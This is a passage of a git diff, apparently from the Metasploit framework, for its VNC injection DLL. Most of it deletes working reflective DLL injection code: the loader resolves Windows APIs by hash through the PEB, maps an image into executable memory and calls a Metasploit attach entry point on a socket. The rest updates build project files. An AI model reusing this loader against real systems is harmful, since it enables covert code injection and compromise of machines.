- uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
- // some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
- // we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
- if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
- {
- uiHeaderValue += uiLibraryAddress;
- // break if we have found a valid MZ/PE header
- if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
- break;
- }
- }
- uiLibraryAddress--;
- }
-
- // STEP 1: process the kernels exports for the functions our loader needs...
-
- // get the Process Enviroment Block
-#ifdef _WIN64
- uiBaseAddress = __readgsqword( 0x60 );
-#else
- uiBaseAddress = __readfsdword( 0x30 );
-#endif
-
- // get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
- uiBaseAddress = (UINT_PTR)((_PPEB)uiBaseAddress)->pLdr;
-
- // get the first entry of the InMemoryOrder module list
- uiValueA = (UINT_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
- while( uiValueA )
- {
- // get pointer to current modules name (unicode string)
- uiValueB = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
- // set bCounter to the length for the loop
- usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
- // clear uiValueC which will store the hash of the module name
- uiValueC = 0;
- // compute the hash of the module name...
- do
- {
- uiValueC = ror( (DWORD)uiValueC );
- // normalize to uppercase if the madule name is in lowercase
- if( *((BYTE *)uiValueB) >= 'a' )
- uiValueC += *((BYTE *)uiValueB) - 0x20;
- else
- uiValueC += *((BYTE *)uiValueB);
- uiValueB++;
- } while( --usCounter );
- // compare the hash with that of kernel32.dll
- if( (DWORD)uiValueC == KERNEL32DLL_HASH )
- {
- // get this modules base address
- uiBaseAddress = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
- break;
- }
- // get the next entry
- uiValueA = DEREF( uiValueA );
- }
-
- // get the VA of the modules NT Header
- uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
-
- // uiNameArray = the address of the modules export directory entry
- uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
-
- // get the VA of the export directory
- uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
-
- // get the VA for the array of name pointers
- uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
-
- // get the VA for the array of name ordinals
- uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
-
- usCounter = 3;
-
- // loop while we still have imports to find
- while( usCounter > 0 )
- {
- // compute the hash values for this function name
- dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
-
- // if we have found a function we want we get its virtual address
- if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH )
- {
- // get the VA for the array of addresses
- uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
-
- // use this functions name ordinal as an index into the array of name pointers
- uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
-
- // store this functions VA
- if( dwHashValue == LOADLIBRARYA_HASH )
- pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
- else if( dwHashValue == GETPROCADDRESS_HASH )
- pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
- else if( dwHashValue == VIRTUALALLOC_HASH )
- pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
-
- // decrement our counter
- usCounter--;
- }
-
- // get the next exported function name
- uiNameArray += sizeof(DWORD);
-
- // get the next exported function name ordinal
- uiNameOrdinals += sizeof(WORD);
- }
-
- // STEP 2: load our image into a new permanent location in memory...
-
- // get the VA of the NT Header for the PE to be loaded
- uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
-
- // allocate all the memory for the DLL to be loaded into. we can load at any address because we will
- // relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
- uiBaseAddress = (UINT_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
-
- // we must now copy over the headers
- uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
- uiValueB = uiLibraryAddress;
- uiValueC = uiBaseAddress;
- __movsb( (PBYTE)uiValueC, (PBYTE)uiValueB, uiValueA );
-
- // STEP 3: load in all of our sections...
-
- // uiValueA = the VA of the first section
- uiValueA = ( (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
-
- // itterate through all sections, loading them into memory.
- while( ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections-- )
- {
- // uiValueB is the VA for this section
- uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
-
- // uiValueC if the VA for this sections data
- uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
-
- // copy the section over
- uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
- __movsb( (PBYTE)uiValueB, (PBYTE)uiValueC, uiValueD );
-
- // get the VA of the next section
- uiValueA += sizeof( IMAGE_SECTION_HEADER );
- }
-
- // STEP 4: process our images import table...
-
- // uiValueB = the address of the import directory
- uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
-
- // we assume their is an import table to process
- // uiValueC is the first entry in the import table
- uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
-
- // itterate through all imports
- while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name )
- {
- // use LoadLibraryA to load the imported module into memory
- uiLibraryAddress = (UINT_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
-
- // uiValueD = VA of the OriginalFirstThunk
- uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
-
- // uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
- uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
-
- // itterate through all imported functions, importing by ordinal if no name present
- while( DEREF(uiValueA) )
- {
- // sanity check uiValueD as some compilers only import by FirstThunk
- if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
- {
- // get the VA of the modules NT Header
- uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
-
- // uiNameArray = the address of the modules export directory entry
- uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
-
- // get the VA of the export directory
- uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
-
- // get the VA for the array of addresses
- uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
-
- // use the import ordinal (- export ordinal base) as an index into the array of addresses
- uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
-
- // patch in the address for this imported function
- DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
- }
- else
- {
- // get the VA of this functions import by name struct
- uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
-
- // use GetProcAddress and patch in the address for this imported function
- DEREF(uiValueA) = (UINT_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
- }
- // get the next imported function
- uiValueA += sizeof( UINT_PTR );
- if( uiValueD )
- uiValueD += sizeof( UINT_PTR );
- }
-
- // get the next import
- uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
- }
-
- // STEP 5: process all of our images relocations...
-
- // calculate the base address delta and perform relocations (even if we load at desired image base)
- uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
-
- // uiValueB = the address of the relocation directory
- uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
-
- // check if their are any relocations present
- if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
- {
- // uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
- uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
-
- // and we itterate through all entries...
- while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
- {
- // uiValueA = the VA for this relocation block
- uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
-
- // uiValueB = number of entries in this relocation block
- uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
-
- // uiValueD is now the first entry in the current relocation block
- uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
-
- // we itterate through all the entries in the current block...
- while( uiValueB-- )
- {
- // perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
- // we dont use a switch statement to avoid the compiler building a jump table
- // which would not be very position independent!
- if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
- *(UINT_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
- else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
- *(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
- else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
- *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
- else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
- *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
-
- // get the next entry in the current relocation block
- uiValueD += sizeof( IMAGE_RELOC );
- }
-
- // get the next entry in the relocation directory
- uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
- }
- }
-
- // STEP 6: process the images exception directory if it has one (PE32+ for x64)
-/*
- // uiValueB = the address of the relocation directory
- uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXCEPTION ];
- // check if their are any exception etries present
- if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
- {
- // get the number of entries
- uiValueA = ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size / sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
-
- // uiValueC is now the first entry (IMAGE_RUNTIME_FUNCTION_ENTRY)
- uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
-
- // itterate through all entries
- while( uiValueA-- )
- {
- //((IMAGE_RUNTIME_FUNCTION_ENTRY)uiValueC).BeginAddress
-
- // get the next entry
- uiValueC += sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
- }
- }
-*/
- // STEP 7: call our images entry point
-
- // uiValueA = the VA of our newly loaded DLL/EXE's entry point
- uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
-
- // call our respective entry point, fudging our hInstance value
-#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
- // if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
- ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
-#else
- // if we are injecting an DLL via a stub we call DllMain with no parameter
- ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL );
-#endif
-
- // STEP 8: return our new entry point address so whatever called us can call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH
- return uiValueA;
-}
-//===============================================================================================//
-#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
-
-// you must implement this function...
-extern DWORD DLLEXPORT Init( SOCKET socket );
-
-BOOL MetasploitDllAttach( SOCKET socket )
-{
- Init( socket );
- return TRUE;
-}
-
-BOOL MetasploitDllDetach( DWORD dwExitFunc )
-{
- switch( dwExitFunc )
- {
- case EXITFUNC_SEH:
- SetUnhandledExceptionFilter( NULL );
- break;
- case EXITFUNC_THREAD:
- ExitThread( 0 );
- break;
- case EXITFUNC_PROCESS:
- ExitProcess( 0 );
- break;
- default:
- break;
- }
-
- return TRUE;
-}
-
-BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
-{
- BOOL bReturnValue = TRUE;
- switch( dwReason )
- {
- case DLL_METASPLOIT_ATTACH:
- bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved );
- break;
- case DLL_METASPLOIT_DETACH:
- bReturnValue = MetasploitDllDetach( (DWORD)lpReserved );
- break;
- case DLL_QUERY_HMODULE:
- if( lpReserved != NULL )
- *(HMODULE *)lpReserved = hAppInstance;
- break;
- case DLL_PROCESS_ATTACH:
- hAppInstance = hinstDLL;
- break;
- case DLL_PROCESS_DETACH:
- case DLL_THREAD_ATTACH:
- case DLL_THREAD_DETACH:
- break;
- }
- return bReturnValue;
-}
-
-#endif
-//===============================================================================================//
diff --git a/external/source/vncdll/winvnc/ReflectiveLoader.h b/external/source/vncdll/winvnc/ReflectiveLoader.h
deleted file mode 100644
index 224fa0eb68..0000000000
--- a/external/source/vncdll/winvnc/ReflectiveLoader.h
+++ /dev/null
@@ -1,197 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _VNCDLL_LOADER_REFLECTIVELOADER_H
-#define _VNCDLL_LOADER_REFLECTIVELOADER_H
-//===============================================================================================//
-#define WIN32_LEAN_AND_MEAN
-#include
-#include
-#include
-
-#include "ReflectiveDLLInjection.h"
-
-#define EXITFUNC_SEH 0xEA320EFE
-#define EXITFUNC_THREAD 0x0A2A1DE0
-#define EXITFUNC_PROCESS 0x56A2B5F0
-
-typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
-typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
-typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
-
-#define KERNEL32DLL_HASH 0x6A4ABC5B
-#define LOADLIBRARYA_HASH 0xEC0E4E8E
-#define GETPROCADDRESS_HASH 0x7C0DFCAA
-#define VIRTUALALLOC_HASH 0x91AFCA54
-
-#define HASH_KEY 13
-//===============================================================================================//
-#pragma intrinsic( _rotr )
-
-__forceinline DWORD ror( DWORD d )
-{
- return _rotr( d, HASH_KEY );
-}
-
-
-
-__forceinline DWORD hash( char * c )
-{
- register DWORD h = 0;
- do
- {
- h = ror( h );
- h += *c;
- } while( *++c );
-
- return h;
-}
-//===============================================================================================//
-typedef struct _UNICODE_STR
-{
- USHORT Length;
- USHORT MaximumLength;
- PWSTR pBuffer;
-} UNICODE_STR, *PUNICODE_STR;
-
-// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
-//__declspec( align(8) )
-typedef struct _LDR_DATA_TABLE_ENTRY
-{
- //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
- LIST_ENTRY InMemoryOrderModuleList;
- LIST_ENTRY InInitializationOrderModuleList;
- PVOID DllBase;
- PVOID EntryPoint;
- ULONG SizeOfImage;
- UNICODE_STR FullDllName;
- UNICODE_STR BaseDllName;
- ULONG Flags;
- SHORT LoadCount;
- SHORT TlsIndex;
- LIST_ENTRY HashTableEntry;
- ULONG TimeDateStamp;
-} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
-
-// WinDbg> dt -v ntdll!_PEB_LDR_DATA
-typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
-{
- DWORD dwLength;
- DWORD dwInitialized;
- LPVOID lpSsHandle;
- LIST_ENTRY InLoadOrderModuleList;
- LIST_ENTRY InMemoryOrderModuleList;
- LIST_ENTRY InInitializationOrderModuleList;
- LPVOID lpEntryInProgress;
-} PEB_LDR_DATA, * PPEB_LDR_DATA;
-
-// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
-typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
-{
- struct _PEB_FREE_BLOCK * pNext;
- DWORD dwSize;
-} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
-
-// struct _PEB is defined in Winternl.h but it is incomplete
-// WinDbg> dt -v ntdll!_PEB
-typedef struct __PEB // 65 elements, 0x210 bytes
-{
- BYTE bInheritedAddressSpace;
- BYTE bReadImageFileExecOptions;
- BYTE bBeingDebugged;
- BYTE bSpareBool;
- LPVOID lpMutant;
- LPVOID lpImageBaseAddress;
- PPEB_LDR_DATA pLdr;
- LPVOID lpProcessParameters;
- LPVOID lpSubSystemData;
- LPVOID lpProcessHeap;
- PRTL_CRITICAL_SECTION pFastPebLock;
- LPVOID lpFastPebLockRoutine;
- LPVOID lpFastPebUnlockRoutine;
- DWORD dwEnvironmentUpdateCount;
- LPVOID lpKernelCallbackTable;
- DWORD dwSystemReserved;
- DWORD dwAtlThunkSListPtr32;
- PPEB_FREE_BLOCK pFreeList;
- DWORD dwTlsExpansionCounter;
- LPVOID lpTlsBitmap;
- DWORD dwTlsBitmapBits[2];
- LPVOID lpReadOnlySharedMemoryBase;
- LPVOID lpReadOnlySharedMemoryHeap;
- LPVOID lpReadOnlyStaticServerData;
- LPVOID lpAnsiCodePageData;
- LPVOID lpOemCodePageData;
- LPVOID lpUnicodeCaseTableData;
- DWORD dwNumberOfProcessors;
- DWORD dwNtGlobalFlag;
- LARGE_INTEGER liCriticalSectionTimeout;
- DWORD dwHeapSegmentReserve;
- DWORD dwHeapSegmentCommit;
- DWORD dwHeapDeCommitTotalFreeThreshold;
- DWORD dwHeapDeCommitFreeBlockThreshold;
- DWORD dwNumberOfHeaps;
- DWORD dwMaximumNumberOfHeaps;
- LPVOID lpProcessHeaps;
- LPVOID lpGdiSharedHandleTable;
- LPVOID lpProcessStarterHelper;
- DWORD dwGdiDCAttributeList;
- LPVOID lpLoaderLock;
- DWORD dwOSMajorVersion;
- DWORD dwOSMinorVersion;
- WORD wOSBuildNumber;
- WORD wOSCSDVersion;
- DWORD dwOSPlatformId;
- DWORD dwImageSubsystem;
- DWORD dwImageSubsystemMajorVersion;
- DWORD dwImageSubsystemMinorVersion;
- DWORD dwImageProcessAffinityMask;
- DWORD dwGdiHandleBuffer[34];
- LPVOID lpPostProcessInitRoutine;
- LPVOID lpTlsExpansionBitmap;
- DWORD dwTlsExpansionBitmapBits[32];
- DWORD dwSessionId;
- ULARGE_INTEGER liAppCompatFlags;
- ULARGE_INTEGER liAppCompatFlagsUser;
- LPVOID lppShimData;
- LPVOID lpAppCompatInfo;
- UNICODE_STR usCSDVersion;
- LPVOID lpActivationContextData;
- LPVOID lpProcessAssemblyStorageMap;
- LPVOID lpSystemDefaultActivationContextData;
- LPVOID lpSystemAssemblyStorageMap;
- DWORD dwMinimumStackCommit;
-} _PEB, * _PPEB;
-
-typedef struct
-{
- WORD offset:12;
- WORD type:4;
-} IMAGE_RELOC, *PIMAGE_RELOC;
-//===============================================================================================//
-#endif
-//===============================================================================================//
diff --git a/external/source/vncdll/winvnc/VSocket.cpp b/external/source/vncdll/winvnc/VSocket.cpp
old mode 100644
new mode 100755
index d9906fd03e..43df3023d0
--- a/external/source/vncdll/winvnc/VSocket.cpp
+++ b/external/source/vncdll/winvnc/VSocket.cpp
@@ -70,7 +70,7 @@ class VSocket;
////////////////////////////////////////////////////////
// *** Lovely hacks to make Win32 work. Hurrah!
-#ifdef __WIN32__
+#if defined(__WIN32__) && !defined(EWOULDBLOCK)
#define EWOULDBLOCK WSAEWOULDBLOCK
#endif
diff --git a/external/source/vncdll/winvnc/WinVNC.vcproj b/external/source/vncdll/winvnc/WinVNC.vcproj
deleted file mode 100644
index 4fea3fe033..0000000000
--- a/external/source/vncdll/winvnc/WinVNC.vcproj
+++ /dev/null
@@ -1,1200 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
diff --git a/external/source/vncdll/winvnc/WinVNC.vcxproj b/external/source/vncdll/winvnc/WinVNC.vcxproj
new file mode 100755
index 0000000000..37efead766
--- /dev/null
+++ b/external/source/vncdll/winvnc/WinVNC.vcxproj
@@ -0,0 +1,473 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ winvnc
+ {EA6A09AC-04BB-423D-8842-CA48DF901058}
+ WinVNC
+ .
+
+
+
+ DynamicLibrary
+ v120_xp
+ false
+ MultiByte
+
+
+ DynamicLibrary
+ v120_xp
+ false
+ MultiByte
+
+
+ DynamicLibrary
+ v120_xp
+ false
+ MultiByte
+
+
+ DynamicLibrary
+ v120_xp
+ false
+ MultiByte
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>12.0.21005.1
+
+
+ $(ProjectDir)$(Configuration)\$(Platform)\
+ $(ProjectDir)$(Configuration)\$(Platform)\
+ true
+ false
+ false
+ false
+ $(ProjectName).$(PlatformShortName)
+ .dll
+
+
+ $(ProjectDir)$(Configuration)\$(Platform)\
+ $(ProjectDir)$(Configuration)\$(Platform)\
+ true
+ false
+ false
+ false
+ $(ProjectName).$(PlatformShortName)
+ .dll
+
+
+ $(ProjectDir)$(Configuration)\$(Platform)\
+ $(ProjectDir)$(Configuration)\$(Platform)\
+ true
+ true
+ $(ProjectName).$(PlatformShortName)
+ .dll
+
+
+ $(ProjectDir)$(Configuration)\$(Platform)\
+ $(ProjectDir)$(Configuration)\$(Platform)\
+ true
+ true
+ $(ProjectName).$(PlatformShortName)
+ .dll
+
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ true
+ true
+ Win32
+
+
+ OnlyExplicitInline
+ ..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;_WINSTATIC;NCORBA;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+ true
+
+ true
+ Level3
+ true
+ Default
+
+
+ NDEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)
+ 0x0409
+
+
+
+
+
+ /MACHINE:I386 %(AdditionalOptions)
+ ws2_32.lib;%(AdditionalDependencies)
+ $(OutDir)$(TargetName)$(TargetExt)
+ true
+ type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies)
+ true
+ Windows
+ true
+ true
+ false
+ false
+ MachineX86
+
+
+ editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
+exit 0
+
+
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ true
+ true
+ X64
+ false
+
+
+
+
+ OnlyExplicitInline
+ ..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;__WIN32__;__NT__;__x64__;_WINSTATIC;NCORBA;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+ true
+
+ true
+ Level3
+ true
+ Default
+
+
+ NDEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)
+ 0x0409
+
+
+
+
+
+ ws2_32.lib;%(AdditionalDependencies)
+ $(OutDir)$(TargetName)$(TargetExt)
+ false
+
+ false
+ Windows
+ true
+ true
+
+
+ NotSet
+ true
+
+
+ editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" > NUL
+exit 0
+
+
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ true
+ true
+ Win32
+
+
+ Disabled
+ ..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)
